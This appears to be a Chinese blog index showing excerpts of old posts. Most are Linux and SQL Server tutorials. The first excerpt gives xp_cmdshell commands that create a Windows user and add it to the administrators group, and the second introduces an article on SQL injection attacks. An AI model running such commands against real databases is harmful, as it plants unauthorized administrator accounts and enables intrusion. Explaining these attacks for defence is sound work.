/* * 功能:通过xp_cmdshell执行命令 * 本例:添加一个系统帐号,并加入管理员组. */exec master.xp_cmdshell net user kgdiwss 123 /addexec master.xp_cmdshell net localgroup administrators kgdiwss /add/* * 功能:将执行结果写入htm文件 * 注意:

发布博客于 15 年前

sql入侵

关键词： sql入侵摘要:下文是为了帮助那些希望能掌握这个漏洞的运用、并想得知如何保护自己免受这种漏洞攻击的人了解该漏洞的本质而写的。详细资料:1.0绪论当一台机器只开放了80端口(这里指的是提供HTTP服务)时，可能你的大多数漏洞扫描器都不能给到你很多有价值的信息(漏洞信息)，倘若这台机器的管理员是

发布博客于 15 年前

SQL Server中各个系统表的作用

sysaltfiles 主数据库保存数据库的文件 syscharsets 主数据库字符集与排序顺序 sysconfigures 主数据库配置选项 syscurconfigs 主数据库当前配置选项 sysdatabases

发布博客于 15 年前

一些sql语句的详细解释[更新:2006.5.23]

/* *注释添加:∮明天去要饭*/SELECT /* * 输出格式: x年x周* 如:200621*/Convert(varchar(4),intYear) + /* 先将intYear列转成字符型 */case when len(intWeek)=1 /* 判断intWeek列的长度是否为1 */ then 0 + Convert(

发布博客于 15 年前

Linux 下的三大软件安装方式

1.通过RPM软件包来安装　　说起RPM(REDHAT Package Management)标准的软件包，大家可能都会想起大名鼎鼎的REDHAT公司，正是RPM软件包发行方式的出现，使Linux中的应用软件安装变得简单。如果用户想安装按RPM方式发行的软件，只需简单地输入命令“rpm -ivh xxx.rpm”即可。　　比如用户想安装 OpenOffice.org-1.0.1.rpm软件包，

发布博客于 15 年前

一切从基础开始Linux入门命令篇

　　1.man 对你熟悉或不熟悉的命令提供帮助解释　　eg:man ls 就可以查看ls相关的用法　　注：按q键或者ctrl+c退出,在linux下可以使用ctrl+c终止当前程序运行　　2.ls 查看目录或者文件的属*,列举出任一目录下面的文件　　eg: ls /usr/man　　ls -l　　a.d表示目录(directory),如果是一个"-"表示是文件,如果是l则表示是一个连接文件(l

发布博客于 15 年前

linux新手入门问题收集[整理]

1.问：如何为Red Hat 9添加新字体？答：要为Red Hat Linux 9添加新字体，可以按照以下步骤完成：1. 创建 /usr/share/fonts/local/ 目录（如果它不存在）：mkdir /usr/share/fonts/local/ 如果你必须要创建/usr/share/fonts/local/，就要把它添加到X字体服务器的路径中，使用以下命令来完成该功能：c

发布博客于 15 年前

菜鸟浅谈Linux内核编译过程

双眼皮的猪菜鸟俺，最近研究了一下Linux内核的编译，有些许心得，望同大家分享一下，故有此文…我们这里要谈的不涉及到源码，只是一些内核编译的步骤及相关知识…因为本人是菜鸟。所以，也就希望和菜鸟们分享一下… 首先，您要确定您有一台装有Linux的系统,编译内核可以在本机上直接对本机内核进行编译，也可以从网上下载内核在其基础上进行编译.我们这里详细讲一下升级内核的

发布博客于 15 年前

Linux根目录下主要目录功能说明[整理]

/bin：存放最常用命令；　　/boot：启动Linux的核心文件；　　/dev：设备文件；　　/etc：存放各种配置文件；　　/home：用户主目录；　　/lib：系统最基本的动态链接共享库；　　/mnt：一般是空的，用来临时挂载别的文件系统；　　/proc：虚拟目录，是内存的映射；　　/sbin：系统管理员命令存放目录；　　/usr：最大的目录，存许应用程序

发布博客于 15 年前

Linux下添加硬盘，分区，格式化详解

预备知识在我们添加硬盘前，首先要了解linux系统下对硬盘和分区的命名方法。在Linux下对IDE的设备是以hd命名的，第一个ide设备是hda，第二个是hdb。依此类推我们一般主板上有两个IDE接口，一共可以安装四个IDE设备。主IDE上的两个设备分别对应hda和hdb，第二个IDE口上的两个设备对应hdc和hdd。一般我们的硬盘安装在主IDE的主接口上，所以是hda

发布博客于 15 年前